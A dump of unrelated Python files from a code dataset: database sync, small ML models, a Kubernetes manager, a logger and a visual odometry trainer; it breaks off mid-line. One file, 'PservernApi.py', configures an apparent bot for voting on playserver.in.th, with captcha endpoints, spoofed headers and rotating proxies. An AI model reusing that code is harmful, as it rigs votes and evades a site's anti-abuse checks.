Author: Wusf --<>\n Purpose: \n Created: 2015/3/19\n\"\"\"\n\nimport logging\nimport sys\nimport cx_Oracle\nimport ConfigParser\nimport sqlite3\nfrom PyQt4 import QtGui,QtCore\nimport time \nimport os\nfrom dateutil import parser\n\nrootD = os.path.abspath('../../')\nsys.path.append(rootD)\nimport global_config as config\nimport qsdp_lib.tool.wind_db_tools.ConnectToWindDatabase as CWD\nimport qsdp_lib.tool.local_db_tools.GetAllWindStockCode as GLSI\nimport qsdp_lib.tool.local_db_tools.GetTradeDays as GTD\n\n\n\n########################################################################\nclass SyncDividentIssueRelatedData(object):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self):\n \"\"\"Constructor\"\"\"\n \n conf = ConfigParser.ConfigParser()\n conf.read(config.DB_CONFIG_PATH)\n self._stockListDire = conf.get(\"LocalWindSyncDatabase\",\"StockCodePath\")\n self._stockListFile = conf.get(\"LocalWindSyncDatabase\",\"StockCodeFile\" )\n self._corporateActionDire = conf.get(\"EventAndNewsDatabase\",\"RawEventDataPath\")\n #self._corporateActionFile = conf.get(\"EventAndNewsDatabase\",\"db_CorpActionStockDivident\")\n self.logger = logging.getLogger()\n self.logger.setLevel(logging.DEBUG)\n\n #----------------------------------------------------------------------\n def CreateLocalDatabase(self):\n \"\"\"\"\"\"\n self.logger.info(\"Create local database: corporate action - stock divident\")\n liteConn = sqlite3.connect(self._corporateActionDire+'RawEvent.db')\n liteCur = liteConn.cursor()\n liteConn.execute(\"Drop table if exists DividentIssue\")\n liteSql = \"Create table DividentIssue(TradeID text,WindGenTime datetime,WindUpdateTime datetime,WindID text,BonusStkDeno double,BonusStkNume double,TransStkDeno double,TransStkNume double,DivDeno,DivBfT double,DivAfT double, DivYear text,RegistDay text,ExDivDay text,DivDistDay text,DivStkTrdDay text,PrePlanPreAnnounDay text,AnnounDay text,PrePlanAnnounDay text,MeetingAnnounDay text,ImplemDay text,Progress int)\"\n self.logger.info('SQL:'+liteSql)\n liteConn.execute(liteSql)\n liteConn.commit() \n \n #----------------------------------------------------------------------\n def Sync(self):\n \"\"\"\"\"\"\n self.logger.info(\"Synchronize local database: corporate action - stock divident\")\n windConn = CWD.ConnectToWindDatabase() \n liteConn = sqlite3.connect(self._corporateActionDire+'RawEvent.db')\n liteCur = liteConn.cursor()\n startTime = \"2009-01-01\"\n orSql = \"select ob_release_date_1093,rp_gen_datetime,f1_1093,f4_1093,f5_1093,f6_1093,f7_1093,f8_1093,f9_1093,f10_1093,f24_1093,f25_1093,f26_1093,f27_1093,f28_1093,f33_1093,f36_1093,f41_1093,f42_1093,f43_1093,f3_1093 from winddb.tb_object_1093 where ob_release_date_1093> to_date('%s','yyyy-mm-dd hh24:mi:ss') \"%(startTime)\n liteSql = \"Insert into DividentIssue(TradeID,WindGenTime,WindUpdateTime,WindID,BonusStkDeno,BonusStkNume,TransStkDeno,TransStkNume,DivDeno,DivBfT,DivAfT,DivYear,RegistDay,ExDivDay,DivDistDay,DivStkTrdDay,PrePlanPreAnnounDay,AnnounDay,PrePlanAnnounDay,MeetingAnnounDay,ImplemDay,Progress) values(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)\"\n orCur = windConn.cursor()\n orCur.execute(orSql)\n content = orCur.fetchall()\n windID_trdID = GLSI.GetAllWindStockCode()[0]\n for row in content:\n #print windID_trdID[row[2]]\n if windID_trdID.has_key(row[2]):\n liteCur.execute(liteSql, (windID_trdID[row[2]][0],)+row)\n self.logger.info(liteSql+windID_trdID[row[2]][0]+str(row[1:]))\n liteConn.commit()\n liteConn.close()\n windConn.close()\n \n \n \n \n \n\n \nif __name__ == \"__main__\":\n \n SDD = SyncDividentIssueRelatedData()\n SDD.CreateLocalDatabase()\n SDD.Sync()\n \n \n \n \n \n","sub_path":"qs_lib/_backups/sync_wind/SyncEvent_DividentIssueRelated.py","file_name":"SyncEvent_DividentIssueRelated.py","file_ext":"py","file_size_in_byte":4037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"409522080","text":"import numpy as np\n\n\n# isSmoke | isObesity | isDoExercise\n# We predict whether the person is diabet or not in the future\n\nfeature_set = np.array([[0, 1, 0], [0, 0, 1], [1, 0, 0], [1, 1, 0], [1, 1, 1]]) # 5 x 3\nlabels = np.array([[1, 0, 0, 1, 1]]).reshape(5, 1) # 5 x 1\n\n\nweights = np.random.randn(3, 1) # weights\nbias = np.random.randn(1) # bias\n\n\nlearning_rate = 0.5\n\ndef sigmoid(x):\n return (1 / (np.exp(-x) + 1))\n\ndef sigmoid_der(x):\n return (sigmoid(x) * (1 - sigmoid(x)))\n\nfor epoch in range(20000):\n input_set = feature_set.T\n\n # Feed forward\n\n predicted = sigmoid(np.dot(feature_set, weights) + bias)\n\n error = predicted - labels\n print(error.sum())\n\n # Backpropagation\n dcost_dpred = error\n dpred_dz = sigmoid_der(predicted)\n\n z_delta = dcost_dpred * dpred_dz\n\n weights -= learning_rate * np.dot(input_set, z_delta)\n for num in z_delta:\n bias -= learning_rate * num\n\n\n# Example\n\nexample_data = np.array([0, 1, 1])\n\npredicted_output = sigmoid(np.dot(example_data, weights) + bias)\n\nprint(predicted_output)\n","sub_path":"hello.py","file_name":"hello.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"286933097","text":"from keras.engine.topology import Layer\nimport keras.backend as K\nfrom keras.utils import conv_utils\n\nclass CompenastionLayer(Layer):\n \"\"\"\n 完成卷积分解后的补偿,主要先通过一个可分离卷积获取形状然后通过1*1的卷积补充通道\n \n \"\"\"\n def __init__(self,filters,kernel_size,strides=(1,1),padding='valid',kernel_regularizer=None,fist_layer=False,alph=0.125,kernel_initializer='glorot_uniform',**kwargs):\n \n self.filters=filters\n self.kernel_size=kernel_size\n self.strides=strides\n self.padding=padding\n self.kernel_regularizer=kernel_regularizer\n self.kernel_initializer=kernel_initializer\n self.fist_layer=fist_layer\n if self.fist_layer:\n self.alph=1.0\n else:\n self.alph=alph\n super(CompenastionLayer, self).__init__(**kwargs)\n \n def build(self,input_shape):\n \n depthwise_kernel_shape = (self.kernel_size[0],\n self.kernel_size[1],\n input_shape[3],\n 1)\n self.depthwise_kernel = self.add_weight(\n shape=depthwise_kernel_shape,\n initializer=self.kernel_initializer,\n name='depthwise_kernel',\n regularizer=self.kernel_regularizer)\n \n self.kernel=self.add_weight(\n shape=(1,1,int(self.alph*input_shape[3]),self.filters),\n initializer=self.kernel_initializer,\n name='kernel',\n regularizer=self.kernel_regularizer)\n \n self.built = True\n \n def call(self,x):\n depthwise_outputs=K.depthwise_conv2d(x,self.depthwise_kernel,\n strides=self.strides,\n padding=self.padding,)\n if self.fist_layer:\n x1=depthwise_outputs\n else:\n num=int(self.alph*K.int_shape(depthwise_outputs)[-1])\n step=int(1/self.alph)\n T=[]\n for i in range(0,num,2):\n a1=depthwise_outputs[:,:,:,(i*step):(i+1)*step]\n a2=depthwise_outputs[:,:,:,((i+1)*step):(i+2)*step]\n T.append(K.sum(a1,axis=-1,keepdims=True))\n T.append(K.sum(a2,axis=-1,keepdims=True))\n x1=K.concatenate(T)\n \n x1=K.relu(x1)\n outputs=K.conv2d(x1,self.kernel)\n \n return outputs\n \n def compute_output_shape(self,input_shape):\n \n rows = input_shape[1]\n cols = input_shape[2]\n rows = conv_utils.conv_output_length(rows, self.kernel_size[0],\n self.padding,\n self.strides[0])\n cols = conv_utils.conv_output_length(cols, self.kernel_size[1],\n self.padding,\n self.strides[1])\n \n return (input_shape[0],rows,cols,self.filters)\n \n\n","sub_path":"代码/vgg/group_compensation.py","file_name":"group_compensation.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308551615","text":"from collections import defaultdict\nclass Solution:\n def decodeString(self, s):\n stack = []\n tstr = []\n tnum = -1\n for c in s:\n if c == ']':\n tstr = []\n while stack[-1] != '[':\n tstr.append(stack.pop())\n stack.pop()\n tnum = 0\n base = 1\n while stack and stack[-1].isdigit():\n tnum += int(stack.pop()) * base\n base *= 10\n tstr = tstr * tnum\n for ts in tstr[::-1]:\n stack.append(ts)\n else:\n stack.append(c)\n \n ans = []\n while stack:\n ans = [stack.pop()] + ans\n ans = ''.join(ans)\n return ans\n\n\n\n\n\n \nif __name__ == '__main__':\n sol = Solution()\n \n s = \"3[a]2[bc]\"\n s = \"3[a2[c]]\"\n s = \"2[abc]3[cd]ef\"\n s = \"abc3[cd]xyz\"\n s = \"3[a]2[b4[F]c]\"\n s = \"2[ab3[cd]]4[xy]\"\n s = \"100[leetcode]\"\n print(s)\n r = sol.decodeString(s)\n print(r)\n \n\n","sub_path":"lc_394_decode_string.py","file_name":"lc_394_decode_string.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"161923017","text":"\"\"\"\ngeometry.py\n\nModule containing transformations related to geometry.\n\"\"\"\nfrom math import ceil\n\nimport torch\n\n\nclass ShiftsMismatchError(Exception):\n pass\n\n\nclass Geometry2D:\n \"\"\"Define the 2D geometry, which can return shifts which index flattened\n returning shifted flattened states, where the shift is some shift on the\n original lattice\n \"\"\"\n\n def __init__(self, length):\n self.length = length\n # Hard code the checkerboard pattern, could be passed to class.\n checkerboard = torch.zeros((self.length, self.length), dtype=bool)\n checkerboard[1::2, 1::2] = True\n checkerboard[::2, ::2] = True\n self.checkerboard = checkerboard\n self.flat_checker = self.checkerboard.flatten()\n # make split-flat state like object with corresponding indices in flat state\n self.flat_ind_like_split = torch.cat(\n [\n torch.where(checkerboard.flatten())[0],\n torch.where(~checkerboard.flatten())[0],\n ],\n dim=0,\n )\n self.split_ind_like_state = self._split_indices_like_state()\n\n def _split_indices_like_state(self):\n \"\"\"Internal function for calculating the split index like state, which\n is the index of phi_a and phi_b in the flattened state, arranged in the\n shape of the 2D state, used in get_shift\n \"\"\"\n splitind_like_state = torch.zeros((self.length, self.length), dtype=torch.int)\n splitind_like_state[self.checkerboard] = torch.arange(\n int(ceil(self.length ** 2 / 2)), dtype=torch.int\n )\n splitind_like_state[~self.checkerboard] = torch.arange(\n int(ceil(self.length ** 2 / 2)), self.length ** 2, dtype=torch.int\n )\n return splitind_like_state\n\n def get_shift(self, shifts: tuple = (1, 1), dims: tuple = (0, 1)) -> torch.Tensor:\n r\"\"\"Given length, which refers to size of a 2D state (length * length)\n returns a Nx(length^2) tensor where N is the length of `shifts` and `dims`\n (which must be equal). Each row of the returned tensor indexes a flattened\n split state \\phi = (\\phi_even, \\phi_odd) which is split according to a\n checkerboard geometry (even and odd refer to parity of the site). The\n indices refer to shifts on the states in their original 2D form. By default\n N = 2 and get_shift simply returns the right and down nearest neighbours.\n\n Parameters\n ----------\n shifts: tuple\n a tuple of shifts to be applied. Each element represents a shift and can\n either be an integer (if the shift is in a single dimension) or a tuple\n if the shift is applied simultaneously in multiple dimensions (see\n Examples). By default it is set to have two shifts which give right and\n down nearest neighbours\n dims: tuple\n a tuple of dimensions to apply `shifts` to. As with shift, each element\n in dim can itself be a tuple which indicates that multiple shifts will\n be applied in multiple dimensions simultaneously. Note that\n corresponding entries of dims and shifts must also match (either both\n ints or both tuples of same length).\n Returns\n -------\n shift: torch.Tensor\n Tensor which can be used to index flattened, split states such that\n\n state = tensor([\\phi_even, \\phi_odd]),\n\n then state[shift] will return a 2xlength tensor:\n\n state[shift] -> tensor([[neighbour right], [neighbour down]])\n\n Example\n -------\n Consider the small example of 2x2 state:\n\n >>> state_2d = torch.arange(4).view(2, 2)\n >>> state_2d\n tensor([[0, 1],\n [2, 3]])\n\n even sites are [0, 3], odd sites are [1, 2]\n\n >>> state_split = torch.tensor([0, 3, 1, 2])\n >>> shift = get_shift(2)\n >>> state_split[shift]\n tensor([[1, 2, 0, 3],\n [2, 1, 3, 0]])\n\n correct nearest neighbours in reference to the original `state_2d` (left and\n down) are given in each row respectively\n\n to see how multiple shifts works, consider the shift (1, 1)\n (left one, up one)\n\n >>> shift = get_shift(2, shifts=((1, 1),), dims=((0, 1),))\n >>> state_split[shift]\n tensor([[3, 0, 2, 1]])\n\n we see that each element of shifts and dims can perform multiple shifts, in\n different dimensions at once.\n\n Notes\n -----\n The conventions for how the shifts are applied are according the torch.roll\n function, shift = +ve rolls the state left and so the indices will refer to\n lattice sights to the right.\n\n See Also\n --------\n torch.roll: https://pytorch.org/docs/stable/torch.html#torch.roll\n\n \"\"\"\n if len(shifts) != len(dims):\n raise ShiftsMismatchError(\n \"Number of shifts and number of dimensions: \"\n f\"{len(shifts)} and {len(dims)} do not match.\"\n )\n\n shift_index = torch.zeros(\n len(shifts), self.length * self.length, dtype=torch.long\n )\n for i, (shift, dim) in enumerate(zip(shifts, dims)):\n # each shift, roll the 2d state-like indices and then flatten and split\n shift_index[i, :] = self.split_ind_like_state.roll(\n shift, dims=dim\n ).flatten()[self.flat_ind_like_split]\n return shift_index\n","sub_path":"anvil/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":5525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"495661278","text":"\"\"\"\nCreated on Thu May 10 09:37:00 2018\n\n@author: jercas\n\"\"\"\n\nfrom sklearn.metrics import classification_report\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\nimport argparse\n# pickle: used to serialize LogisticRegression model to disk after training.\nimport pickle\nimport h5py\n\ndef main():\n\t# Construct the argument parse and parse the arguments.\n\tap = argparse.ArgumentParser()\n\tap.add_argument(\"-d\", \"--database\", required=True, help=\"path HDF5 database\")\n\tap.add_argument(\"-m\", \"--model\", required=True, help=\"path to output model\")\n\tap.add_argument(\"-j\", \"--jobs\", type=int, default=-1, help=\"# of jobs to run when tuning hyperparameters\")\n\targs = vars(ap.parse_args())\n\n\t# Open the HDF5 database for reading then determine the index of the training and testing split, provided that this data\n\t#was 'already shuffled' prior to writing it to disk.\n\tdb = h5py.File(args[\"database\"], \"r\")\n\t# The boundary of training set(~[:i]) and test set(~[i:]).\n\ti = int(db[\"labels\"].shape[0] * 0.75)\n\n\t# Define the set of parameters that we want to tune then start a grid search where we evaluate out model for each value of C.\n\tprint(\"[INFO] tuning hyperparameters...\")\n\tparams = {\"C\": [0.1, 1.0, 10.0, 100.0, 1000.0, 10000.0]}\n\tmodel = GridSearchCV(LogisticRegression(), params, cv=3, n_jobs=args[\"jobs\"])\n\tmodel.fit(db[\"features\"][:i], db[\"labels\"][:i])\n\n\t# Once the best hyperparameters be founded.\n\tprint(\"[INFO] best hyperparameter: {}\".format(model.best_params_))\n\n\t# Evaluate the model.\n\tprint(\"[INFO] evaluating...\")\n\tpreds = model.predict(db[\"features\"][i:])\n\tprint(classification_report(db[\"labels\"][i:], preds, target_names=[lb_name.split('/')[-1] for lb_name in db[\"label_names\"]]))\n\n\t# Serialize the model to disk.\n\tprint(\"[INFO] saving model...\")\n\tf = open(args[\"model\"], \"wb\")\n\tf.write(pickle.dumps(model.best_estimator_))\n\n\t# End buffer stream.q\n\tf.close()\n\tdb.close()\n\n\nif __name__ == \"__main__\":\n\tmain()","sub_path":"selfImplementation/PB/LogisticRegression_extractFeatures.py","file_name":"LogisticRegression_extractFeatures.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"336175014","text":"import os ,configparser,requests,re,sys\nimport urllib.parse\nfrom msvcrt import getch\n\nclass package_api:\n def load():\n loadconfig = configparser.RawConfigParser()\n loadconfig.readfp(open(r'control/config.txt'))\n # > load control/config.txt\n key = loadconfig.get('default', 'key')\n userid = loadconfig.get('default', 'userid')\n server_id = loadconfig.get('default', 'server_id')\n proxy = loadconfig.get('default', 'proxy')\n proxy_Source = loadconfig.get('proxymode', 'Source')\n proxy_destination = loadconfig.get('proxymode', 'destination')\n proxy_blacklist = loadconfig.get('proxymode', 'blacklist')\n genproxy = loadconfig.get('proxymode', 'genproxy')\n maxproxy = loadconfig.get('proxymode', 'maxproxy')\n proxyfix = int(loadconfig.get('protect', 'proxyfix'))\n logfail = int(loadconfig.get('protect', 'log_FAIL'))\n proxyfix = int(loadconfig.get('protect', 'proxyfix'))\n manyfail = int(loadconfig.get('protect','mf'))\n\n # set url api playserver\n url_server = ('https://playserver.in.th/index.php/Server/')\n url_vote = (\"https://playserver.in.th/index.php/Vote/prokud/\")\n url_image = (\"http://playserver.co/index.php/VoteGetImage/\")\n # set url server from id ----\n try:\n rquest_unpack = requests.get(url_server+str(server_id))\n unpack_text = re.search(url_vote+'(.+?)\"',rquest_unpack.text)\n unpack_unicode = (unpack_text.group(1))\n unpack_Entities = urllib.parse.quote(unpack_unicode)\n except:\n print('\\n Please Check you config.txt/ server_id !! ')\n junk = getch()\n sys.exit()\n\n url_getpic = (\"http://playserver.co/index.php/Vote/ajax_getpic/\"+unpack_Entities)\n url_submitpic = (\"http://playserver.co/index.php/Vote/ajax_submitpic/\"+unpack_Entities)\n header = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Referer\": (url_vote+unpack_Entities)\n }\n # svae data ; return data\n data = {'key':key, 'server':server_id, 'userid':userid, 'url_image': url_image, 'url_getpic': url_getpic, 'url_post': url_submitpic, 'header': header, 'proxy': proxy,'proxy_Source':proxy_Source,'proxy_destination':proxy_destination,'logfail':logfail,'proxyfix':proxyfix,'proxy_blacklist':proxy_blacklist,'manyfail':manyfail,'genproxy':genproxy,'maxproxy': int(maxproxy) }\n return data\n","sub_path":"package/PservernApi.py","file_name":"PservernApi.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"309578323","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n\n\nclass K8sBaseResource(object):\n \"\"\"docstring for K8sBaseResource\"\"\"\n\n def __init__(self, manager, data):\n self._manager = manager\n self._add_details(data)\n\n def __repr__(self):\n reprkeys = sorted(k\n for k in self.__dict__.keys()\n if k[0] != '_' and\n k not in ['manager'])\n info = \", \".join(\"%s=%s\" % (k, getattr(self, k)) for k in reprkeys)\n return \"<%s %s>\" % (self.__class__.__name__, info)\n\n @property\n def api_version(self):\n return self._data.api_version\n\n def _add_details(self, data):\n self._data = data\n for k in [k for k in dir(data)\n if not any((k.startswith('_'), k in ('to_dict', 'to_str')))]:\n try:\n setattr(self, k, getattr(data, k))\n except AttributeError:\n # In this case we already defined the attribute on the class\n pass\n\n def __eq__(self, other):\n if not isinstance(other, K8sBaseResource):\n return NotImplemented\n # two resources of different types are not equal\n if not isinstance(other, self.__class__):\n return False\n return self._info == other._info\n\n\nclass K8sBaseManager(object):\n\n resource_class = None\n\n def __init__(self, api, namespace):\n self._api = api\n self._namespace = namespace\n self._raw = None\n\n @property\n def api(self):\n return self._api\n\n @property\n def namespace(self):\n return self._namespace\n\n def get(self, *args, **kwargs):\n if not hasattr(self, '_get'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_get'))\n\n return self.resource_class(self, self._get(*args, **kwargs))\n\n def list(self, *args, **kwargs):\n if not hasattr(self, '_list'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_list'))\n\n lst = self._list(*args, **kwargs)\n\n return [self.resource_class(self, item) for item in lst.items]\n\n def create(self, *args, **kwargs):\n if not hasattr(self, '_create'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_create'))\n return self.resource_class(self, self._create(*args, **kwargs))\n\n def replace(self, *args, **kwargs):\n if not hasattr(self, '_replace'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_replace'))\n return self._replace(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n if not hasattr(self, '_delete'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_delete'))\n return self._delete(*args, **kwargs)\n\n def deletecollection(self, *args, **kwargs):\n if not hasattr(self, '_deletecollection'):\n raise NotImplementedError(\n '{} does not have {}'.format(self, '_deletecollection'))\n return self._deletecollection(*args, **kwargs)\n","sub_path":"fuel_ccp_tests/managers/k8s/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"334977634","text":"import logging\nimport platform\n\nfrom handler import attach_file_handler, attach_console_handler\n\ndef logger_factory(logger_name: str) -> logging.Logger:\n \n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG)\n \n attach_file_handler(logger, logging.DEBUG)\n attach_file_handler(logger, logging.INFO)\n attach_file_handler(logger, logging.WARNING)\n\n attach_console_handler(logger, logging.DEBUG)\n\n return logger\n\nclass LoggerMeta(type):\n def __init__(cls, name, bases, attrs, **kwargs) -> None:\n super().__init__(name, bases, attrs)\n\n # explicit name mangling\n logger_attribute_name = '_' + cls.__name__ + '__logger'\n \n # ignore inheritance from Logger(Base) for logger name in (Derived)\n if len(cls.mro()) > 2:\n logger_name = f'[ {\".\".join([c.__name__ for c in cls.mro()[-3::-1]])} ]'\n else:\n logger_name = f'[ {str(cls.mro()[-2].__name__)} ]'\n\n setattr(cls, logger_attribute_name, logger_factory(logger_name))\n\nclass Logger(metaclass=LoggerMeta):\n pass","sub_path":"src/logging/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"197538941","text":"# @Time : 28/7/20 11:43\n# @Author : KarKin\n# @FileName: worker.py\n\nimport pickle\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\n\n\nclass LinearModel(object):\n\n def __init__(self, dataset, path = None):\n \n self.model_path = path\n \n if not path:\n self.model = LinearRegression()\n self.dataset = dataset\n else:\n with open(path, 'rb') as f:\n self.model = pickle.load(f) \n\n def train(self):\n\n if self.model_path:\n return \n\n x = self.dataset.data\n y = self.dataset.target\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=5)\n self.model.fit(x_train, y_train)\n\n with open('./algo/linear_regression.pkl', 'wb') as f:\n pickle.dump(self.model, f)\n\n\n\n\nmodel = LinearModel(datasets.load_boston())\nmodel.train()\n\n","sub_path":"algo/train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"456811360","text":"from datetime import datetime\n\nclass todo_item:\n\n def __init__(self, mongo_id, title, description, due_date, status, last_updated):\n self.mongo_id = mongo_id\n self.title = title\n self.description = description\n self.due_date = due_date\n self.status = status\n self.last_updated = self.format_updated(last_updated)\n\n\n def format_updated(self, last_updated):\n iso_date = datetime.strptime(last_updated, '%Y-%m-%dT%H:%M:%S.%fZ')\n simple_date = iso_date.strftime('%d/%m/%Y')\n python_updated = datetime.strptime(simple_date, \"%d/%m/%Y\")\n return python_updated\n ","sub_path":"todo_app/todo_item.py","file_name":"todo_item.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"280519385","text":"'''\n* Copyright (c) 2019 Carnegie Mellon University, Author \n*\n* Not licensed for commercial use. For research and evaluation only.\n*\n'''\nimport torch\nimport torch.autograd as autograd\nimport torch.nn as nn\nfrom torchvision import transforms, utils\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport cv2\nimport numpy as np\nfrom utils import *\nfrom data import transformation as tf\nimport data.data_loader\nimport loss.loss_functions\nimport models.VONet\nimport visualization.my_visualizer as visualizer\nimport evaluate\nfrom options import parse as parse\nfrom hw import learning\n\ntorch.manual_seed(100) # random seed generate random number\n\n\ndef main():\n\n args = parse()\n print(args)\n model,data,loss_func,opti,vis = initialization(args)\n print(model,data,loss_func,opti,vis)\n \n learning_framework = learning.Learning(model,data,opti,loss_func,vis)\n\n learning_framework.train(10)\n \ndef testing(dataloader,vis_para):\n forward_visual_result = []\n ground_truth = []\n epoch_loss = 0\n for i_batch, sample_batched in enumerate(dataloader):\n model.zero_grad()\n batch_loss,result = pad_update(model,sample_batched,with_attention_flag = args.attention_flag,pad_flag = flag.pad_flag)\n\n epoch_loss+=batch_loss\n temp_f = weighted_mean_motion(result,args.attention_flag)\n gt_f_12 = sample_batched['motion_f_01'].numpy()\n forward_visual_result = np.append(forward_visual_result,temp_f)\n ground_truth = np.append(ground_truth,gt_f_12)\n epoch_loss_mean = epoch_loss*args.batch_size\n forward_result = forward_result.reshape(-1,6)*kitti_dataset.motion_stds\n ground_truth = ground_truth.reshape(-1,6)*kitti_dataset.motion_stds\n forward_visual_result_m = tf.ses2poses(forward_visual_result)\n ground_truth_m = tf.ses2poses(ground_truth)\n errors = evaluate.evaluate(ground_truth_m,forward_visual_result_m)\n vis_para.vis.plot_path_with_gt(forward_visual_result_m,ground_truth_m,vis_para.win_number,vis_para.title)\n return errors,epoch_loss_mean\n\ndef initialization(args):\n # parameters and flags\n input_batch_size = args.batch_size\n\n #camera_parameter=[450,180,225,225,225,90]\n #camera_parameter=[651,262,651,651,320,130]\n camera_parameter=[640,180,640,640,320,90]\n image_size = (camera_parameter[1],camera_parameter[0])\n\n ################## init model###########################\n model = models.VONet.PADVONet(coor_layer_flag = args.coor_layer_flag).float()\n if args.use_gpu_flag:\n #model = nn.DataParallel(model.cuda())\n model = model.cuda()\n if args.finetune_flag:\n model.load_state_dict(torch.load(args.model_load))\n ### init optimizer\n optimizer = optim.Adam(model.parameters(), lr=0.01)\n lr_scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=LambdaLR(200, 0,50).step)\n opti = learning.LearningOptim(optimizer,lr_scheduler)\n ################### load data####################\n # training data\n motion_files_path = args.motion_path\n path_files_path = args.image_list_path\n # transform\n transforms_ = [\n transforms.Resize(image_size),\n transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1),\n transforms.ToTensor(),\n transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)) ]\n kitti_dataset = data.data_loader.SepeDataset(path_to_poses_files=motion_files_path,path_to_image_lists=path_files_path,transform_=transforms_,camera_parameter = camera_parameter,coor_layer_flag = args.coor_layer_flag)\n\n learning_data = learning.LearningData()\n learning_data.input_label='image_f_01'\n learning_data.output_label ='motion_f_01'\n learning_data.data_loader_train = DataLoader(kitti_dataset, batch_size=input_batch_size,shuffle=True ,num_workers=1,drop_last=True)\n learning_data.data_loader_vis = DataLoader(kitti_dataset, batch_size=input_batch_size,shuffle=False ,num_workers=1,drop_last=True)\n # testing data\n motion_files_path_test = args.motion_path_test\n path_files_path_test = args.image_list_path_test\n # transform\n transforms_ = [\n transforms.Resize(image_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5,0.5,0.5), (0.5,0.5,0.5)) ]\n kitti_dataset_test = data.data_loader.SepeDataset(path_to_poses_files=motion_files_path_test,path_to_image_lists=path_files_path_test,transform_=transforms_,camera_parameter = camera_parameter,norm_flag=1,coor_layer_flag = args.coor_layer_flag)\n learning_data.data_loader_vid = DataLoader(kitti_dataset_test, batch_size=input_batch_size,shuffle=False ,num_workers=4,drop_last=True)\n\n #########################init visualizer##########################################\n vis = visualizer.Visualizer(args.visdom_ip,args.visdom_port)\n\n #########################loss function ##########################################\n loss_func = nn.MSELoss\n if args.attention_flag:\n loss_func = loss.loss_functions.GroupWithATTLoss\n elif args.pad_flag:\n #loss_func = loss.loss_functions.GroupWithSSLoss \n loss_func = loss.loss_functions.SingleShotLoss\n else:\n loss_func = loss.loss_functions.GroupLoss \n \n return model,learning_data,loss_func,opti,vis\n\ndef weighted_mean_motion(predicted_result,with_attention_flag=False):\n predict_f_12 = predicted_result[0]\n att_f_12 = predicted_result[1]\n if len(predicted_result)==4:\n predict_b_21 = predicted_result[2]\n att_b_21 = predicted_result[3]\n predict_f_12 = torch.cat((predict_f_12,-predict_b_21),2)\n att_f_12 = torch.cat((att_f_12,att_b_21),2)\n att_temp_f = att_f_12.cpu().data.numpy()\n temp_f = predict_f_12.cpu().data.numpy()\n\n if with_attention_flag==False:\n att_temp_f=np.ones(att_temp_f.shape)\n\n#weighted average\n att_temp_f_e = -att_temp_f*np.exp(att_temp_f)\n temp_f_w = temp_f*att_temp_f_e\n temp_f_w_s = np.sum(np.sum(temp_f_w,2),2)\n att_temp_s = np.sum(np.sum(att_temp_f_e,2),2)\n temp_f = temp_f_w_s/att_temp_s\n return temp_f\n\n\ndef pad_update(model,sample_batched,with_attention_flag=False,use_gpu_flag=True,pad_flag=False):\n model.zero_grad()\n input_batch_images_f_12 = sample_batched['image_f_01']\n input_batch_motions_f_12 = sample_batched['motion_f_01']\n input_batch_images_b_21 = sample_batched['image_b_10']\n input_batch_motions_b_21 = sample_batched['motion_b_10']\n if use_gpu_flag:\n input_batch_images_f_12 = input_batch_images_f_12.cuda()\n input_batch_motions_f_12 = 